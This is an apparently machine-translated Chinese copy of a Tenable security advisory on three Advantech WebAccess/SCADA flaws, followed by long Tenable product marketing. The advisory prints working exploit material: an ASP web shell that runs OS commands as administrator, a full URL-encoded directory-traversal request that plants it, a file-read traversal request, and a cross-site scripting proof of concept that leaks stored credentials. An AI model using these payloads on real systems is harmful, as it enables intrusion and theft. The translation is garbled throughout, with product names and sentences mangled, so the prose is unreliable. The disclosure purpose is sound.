脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

多重AdvantechWebAcsess漏洞

临界点

简表

可租地发现多脆弱点

CVE-2018-15705WADashboardAPI认证目录轨迹

目录遍历可远程开发脆弱文件写或覆盖文件系统验证成功开发低特权用户使用

经典ASP网络应用与API并存后,攻击者可写ASP脚本并随后无认证启动这些脚本请注意API进程WADashboard.exe使用管理员OS权限表示文件可写到磁盘上几乎所有目录

具体地说,脆弱性存在的原因是处理HTTPPPOT请求中“/WADashboard/api/dashboard/v1/file/writeFile”中的参数时缺少输入验证sg参数设计值攻击者可以在C:\Inetpub\wwwroot\broadweb目录中创建aSP脚本远程执行代码

IIS网应用由Broadwebpool应用池组成程序池指定进程标识'应用坡度'表示攻击者ASP代码默认使用这些特权webdobj.webdraw类可即时处理,使攻击者访问RemoteWinExec函数通过使用ASP代码中的函数,攻击者可用管理员权限执行OS命令

下图ASP代码可写入文件以方便命令执行

<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Executed command..."%>

HTTPPST请求利用目录遍历并写ASP代码为exec.asp将写到C:\Inetpub/wwwroot/broadweb/

POST /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=%3c%25%20%53%65%74%20%74%3d%53%65%72%76%65%72%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%77%65%62%64%6f%62%6a%2e%77%65%62%64%72%61%77%22%29%3a%74%2e%52%65%6d%6f%74%65%57%69%6e%45%78%65%63%20%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%70%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%6e%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%63%22%29%3a%52%65%73%70%6f%6e%73%65%2e%57%72%69%74%65%20%22%45%78%65%63%75%74%65%64%20%63%6f%6d%6d%61%6e%64%2e%2e%2e%22%25%3e&overwrite=true HTTP/1.1

exec.asp写后,攻击者可修改下链路执行他/她选择命令请注意参数值“p”和“n”必须有效可使用枚举法判定

http://192.168.1.194/broadweb/exec.asp?p=myproject&n=mynode&c=calc.exe

CVE-2018-15706WADashboardAPI验证目录轨迹

目录遍历法可远程利用漏洞读取文件系统任意文件但它确实需要认证可使用WebAcess账号实现此功能并有权限限制(非电源用户)。请注意API进程WADashboard.exe使用管理员OS权限表示几乎所有文件都可读取

弱点存在是因为处理HTTPGet请求的'file'参数时缺少输入验证'/WADashboard/api/dashboard/v1/file/readFile'攻击者通过描述编译的“filepath”值可读取文件系统上的任何文件

HTTP请求编译C:\Windows\win.ini记下项目名 MyProject

GET /WADashboard/api/dashboard/v1/files/readFile?projectSpecies=myproject!savedDashboard&filepath=../../../../../../../windows/win.ini&_=1540926323132 HTTP/1.1

相应的JSON响应机构如下

{"resStatus":"0","resString":"!for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1"}

CVE-2018-15707:Bwmaleft.asp用户证书发布

广网/bwmalift.asp中存在反射跨站脚本脆弱性,因为GET参数未经适当验证或净化活动会话证书写入HTML源码并可由客户端JavaScript访问

数个区 原值pname写入页面JavaScript块需要特别关注下方代码片段mainLeft.asp记下使用aSP直接写入页面的用户名和密码

… snip …   pname = Request.QueryString("pname")   … snip …   username = session("UserName")   'get the password if admin if username = "admin" then  sql = "SELECT * FROM pUserPassword WHERE UserName='" + username + "'" else  sql = "SELECT * FROM pAdmin WHERE UserName='" + username + "'" end if dbTab.open sql,cfgConn,3,2,1   'get the password from database based on the user name, note that only admin can actually log into dashboard here if not dbTab.eof then  set tWAObj = Server.CreateObject("webdobj.webdraw")  GetUserPwdField dbTab, tWAObj, UsrArr  'get the password from db  pwd = UsrArr(0)  %>片段

下方证明概念URL

http://192.168.1.194/broadweb/bwmainleft.asp?pid=1&pname=%22);alert(document.getElementsByTagName(%27script%27)[4].text);//

深入解析,跨站脚本脆弱度可用提取用户名和密码值攻击者可用此技术窃取证书下截图用户名为admin密码为scooby

求解

升级到AdvantechWebAcess8.3.3或后

披露时间线

8/02/2018-向供应商披露90天日期定为10/31/2018
08/09/2018-发送后续邮件看是否收到漏洞披露
08/09/2018-收到Advantech响应重定向不同的安全联系人披露转发到新邮件地址
08/09/2018-新Advantech联系回复说问题会处理
08/09/2018-可租求Advantech确认他们已经收到所有脆弱报告,因为它们被捆绑在一起
8/10/2018-Advantech确认所有问题都已收到
8/27/2018-可点名请求更新问题和何时发布补丁
08/27/2018-Advantech表示,9月下一期发布时将确定一种特有漏洞
08/28/2018-可租性发送提醒多脆弱度并询问9月份是否全部固定
09/04/2018-可点名求澄清哪些脆弱点和日期
09/208-可点名更新
10/18/2018-可租寄友情提醒90天日期
10/22/2018-Advantech发布WebAcess8.3.3修复这些漏洞未通知Tenable
10/31/2018-可租文件发布咨询

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2018-35
信用

克里斯林

sv2基础/时间评分
9.0/7.4
sv2向量
AV:N/AC:L/Au:S/C:C/I:C/A:C
受影响产品
AdvantechWebAcess/SCADA 8.3.1和8.3.2
风险因子
临界点

咨询时间线

10-31-2018-[R1]初始发布

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map